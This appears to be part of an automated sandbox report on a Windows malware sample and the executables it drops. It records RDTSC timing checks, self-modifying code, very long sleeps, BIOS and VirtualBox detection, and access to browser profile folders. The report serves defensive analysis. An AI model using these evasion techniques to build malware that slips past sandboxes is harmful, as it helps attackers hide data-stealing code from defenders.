Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50105AD second address: 50105B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50001C3 second address: 500023F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE70D000D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c push esi 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 pushad 0x00000011 mov cl, F7h 0x00000013 movsx edi, ax 0x00000016 popad 0x00000017 popad 0x00000018 sub esp, 2Ch 0x0000001b pushad 0x0000001c mov dl, ah 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007FDE70D000D1h 0x00000025 sub ecx, 0B15FDD6h 0x0000002b jmp 00007FDE70D000D1h 0x00000030 popfd 0x00000031 mov si, 2547h 0x00000035 popad 0x00000036 popad 0x00000037 xchg eax, ebx 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007FDE70D000D4h 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 500023F second address: 500024E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE71263CEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 500024E second address: 5000274 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, esi 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FDE70D000D9h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000274 second address: 500027A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 500027A second address: 50002BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FDE70D000CAh 0x00000009 and cx, E7E8h 0x0000000e jmp 00007FDE70D000CBh 0x00000013 popfd 0x00000014 mov bx, ax 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebx 0x0000001b jmp 00007FDE70D000D2h 0x00000020 xchg eax, edi 0x00000021 pushad 0x00000022 movsx edx, ax 0x00000025 popad 0x00000026 push eax 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50002BF second address: 50002C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50002C3 second address: 50002D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE70D000CCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50002D3 second address: 50002E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDE71263CEEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000375 second address: 50003A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE70D000D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test al, al 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FDE70D000CDh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50003A3 second address: 50003B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDE71263CECh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50003B3 second address: 500041B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FDE70D00272h 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FDE70D000CDh 0x00000015 adc ch, 00000056h 0x00000018 jmp 00007FDE70D000D1h 0x0000001d popfd 0x0000001e mov dh, ch 0x00000020 popad 0x00000021 lea ecx, dword ptr [ebp-14h] 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 movzx esi, dx 0x0000002a pushfd 0x0000002b jmp 00007FDE70D000D1h 0x00000030 xor si, 1266h 0x00000035 jmp 00007FDE70D000D1h 0x0000003a popfd 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 500041B second address: 5000439 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE71263CF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [ebp-14h], edi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000439 second address: 500043D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 500043D second address: 5000443 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50004FF second address: 5000505 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000505 second address: 500052B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007FDE71263D40h 0x0000000e pushad 0x0000000f movzx eax, dx 0x00000012 pushad 0x00000013 movsx edx, si 0x00000016 push esi 0x00000017 pop edi 0x00000018 popad 0x00000019 popad 0x0000001a cmp dword ptr [ebp-14h], edi 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 mov ecx, edx 0x00000022 mov cx, bx 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 500052B second address: 5000589 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FDE70D000D4h 0x00000008 pop esi 0x00000009 jmp 00007FDE70D000CBh 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 jne 00007FDEE175E010h 0x00000017 jmp 00007FDE70D000D6h 0x0000001c mov ebx, dword ptr [ebp+08h] 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FDE70D000D7h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000589 second address: 50005E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FDE71263CEBh 0x00000008 pop eax 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c lea eax, dword ptr [ebp-2Ch] 0x0000000f pushad 0x00000010 mov dx, 49C8h 0x00000014 movsx ebx, ax 0x00000017 popad 0x00000018 xchg eax, esi 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007FDE71263CF6h 0x00000020 xor ch, 00000028h 0x00000023 jmp 00007FDE71263CEBh 0x00000028 popfd 0x00000029 movzx ecx, bx 0x0000002c popad 0x0000002d push eax 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007FDE71263CECh 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50005E4 second address: 50005F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE70D000CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50005F3 second address: 5000641 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE71263CF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007FDE71263CEEh 0x0000000f nop 0x00000010 jmp 00007FDE71263CF0h 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FDE71263CEEh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000641 second address: 5000687 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, si 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007FDE70D000CFh 0x0000000f xchg eax, ebx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushfd 0x00000014 jmp 00007FDE70D000D2h 0x00000019 jmp 00007FDE70D000D5h 0x0000001e popfd 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000687 second address: 50006CC instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FDE71263CF0h 0x00000008 xor al, 00000068h 0x0000000b jmp 00007FDE71263CEBh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 movzx eax, dx 0x00000016 popad 0x00000017 push eax 0x00000018 pushad 0x00000019 mov bx, si 0x0000001c mov ebx, eax 0x0000001e popad 0x0000001f xchg eax, ebx 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FDE71263CF0h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50006CC second address: 50006D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50006D0 second address: 50006D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50006F7 second address: 50006FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50006FC second address: 5000723 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, ecx 0x00000005 mov ax, 05EDh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov esi, eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov cx, bx 0x00000014 call 00007FDE71263CF1h 0x00000019 pop esi 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000723 second address: 500001B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE70D000CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b jmp 00007FDE70D000D0h 0x00000010 je 00007FDEE175DFD4h 0x00000016 xor eax, eax 0x00000018 jmp 00007FDE70CD97FAh 0x0000001d pop esi 0x0000001e pop edi 0x0000001f pop ebx 0x00000020 leave 0x00000021 retn 0004h 0x00000024 nop 0x00000025 mov edi, eax 0x00000027 cmp edi, 00000000h 0x0000002a setne al 0x0000002d xor ebx, ebx 0x0000002f test al, 01h 0x00000031 jne 00007FDE70D000C7h 0x00000033 jmp 00007FDE70D001B9h 0x00000038 call 00007FDE75097840h 0x0000003d mov edi, edi 0x0000003f jmp 00007FDE70D000D2h 0x00000044 xchg eax, ebp 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 500001B second address: 500001F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 500001F second address: 5000023 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000023 second address: 5000029 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000029 second address: 5000038 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDE70D000CBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000038 second address: 5000068 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE71263CF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d mov edx, 36E70E92h 0x00000012 mov dh, 81h 0x00000014 popad 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000068 second address: 500006C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 500006C second address: 5000072 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000072 second address: 5000094 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE70D000D6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000094 second address: 5000098 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000098 second address: 500009E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 500009E second address: 50000AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDE71263CEBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50000AD second address: 50000C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FDE70D000D1h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50000C9 second address: 50000CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50000CF second address: 50000F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE70D000D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50000F1 second address: 50000F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: E3E032 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: E3C744 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: C91372 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: E46CD8 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: ECE90C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Special instruction interceptor: First address: 5FEB96 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Special instruction interceptor: First address: 79C6C8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Special instruction interceptor: First address: 828C0A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe Special instruction interceptor: First address: 6D1A4C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe Special instruction interceptor: First address: 6D1B3F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe Special instruction interceptor: First address: 91CEDD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 62EB96 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 7CC6C8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Special instruction interceptor: First address: 41DC59 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Special instruction interceptor: First address: 5C8EA6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Special instruction interceptor: First address: 650478 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 858C0A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Special instruction interceptor: First address: 420DAB instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Special instruction interceptor: First address: 61E032 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Special instruction interceptor: First address: 61C744 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Special instruction interceptor: First address: 471372 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Special instruction interceptor: First address: 626CD8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Special instruction interceptor: First address: 6AE90C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Special instruction interceptor: First address: 2B1A4C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Special instruction interceptor: First address: 2B1B3F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Special instruction interceptor: First address: 4FCEDD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\5VHE3T5UQF0Q17ZEPUURN3ZOS.exe Special instruction interceptor: First address: FEEB96 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\5VHE3T5UQF0Q17ZEPUURN3ZOS.exe Special instruction interceptor: First address: 118C6C8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\5VHE3T5UQF0Q17ZEPUURN3ZOS.exe Special instruction interceptor: First address: 1218C0A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe Special instruction interceptor: First address: 4F1A4C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe Special instruction interceptor: First address: 4F1B3F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe Special instruction interceptor: First address: 73CEDD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Special instruction interceptor: First address: B0DC59 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Special instruction interceptor: First address: CB8EA6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Special instruction interceptor: First address: D40478 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Special instruction interceptor: First address: B10DAB instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Memory allocated: 4BF0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Memory allocated: 4D50000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Memory allocated: 6D50000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Memory allocated: 5070000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Memory allocated: 54E0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Memory allocated: 5330000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Code function: 3_2_04D50B3F rdtsc 3_2_04D50B3F
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1297
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1064
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1398
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1017
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1425
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Window / User API: threadDelayed 987
Source: C:\Users\user\Desktop\file.exe TID: 7600 Thread sleep time: -270000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe TID: 7152 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7184 Thread sleep count: 31 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7184 Thread sleep time: -62031s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8176 Thread sleep count: 1297 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8176 Thread sleep time: -2595297s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8188 Thread sleep count: 1064 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8188 Thread sleep time: -2129064s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8148 Thread sleep count: 289 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8148 Thread sleep time: -8670000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7460 Thread sleep time: -360000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6352 Thread sleep count: 1398 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6352 Thread sleep time: -2797398s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8184 Thread sleep count: 1017 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8184 Thread sleep time: -2035017s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1476 Thread sleep count: 1425 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1476 Thread sleep time: -2851425s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe TID: 7136 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe TID: 6204 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe TID: 5940 Thread sleep count: 126 > 30
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe TID: 5940 Thread sleep count: 132 > 30
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe TID: 7180 Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe TID: 6004 Thread sleep count: 987 > 30
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe TID: 6004 Thread sleep count: 101 > 30
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe TID: 7856 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe TID: 7416 Thread sleep time: -90000s >= -30000s
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\PeerDistRepub
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\PlaceholderTileLogoFolder
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Comms
Source: skotes.exe, skotes.exe, 00000009.00000002.1770858812.00000000007AA000.00000040.00000001.01000000.0000000B.sdmp, 8138ba21a1.exe, 0000000A.00000002.1813198385.0000000000601000.00000040.00000001.01000000.0000000F.sdmp, bd214fbd32.exe, 0000000E.00000002.1926320177.0000000000445000.00000040.00000001.01000000.00000010.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: 8138ba21a1.exe, 00000012.00000003.2024644856.00000000059E3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
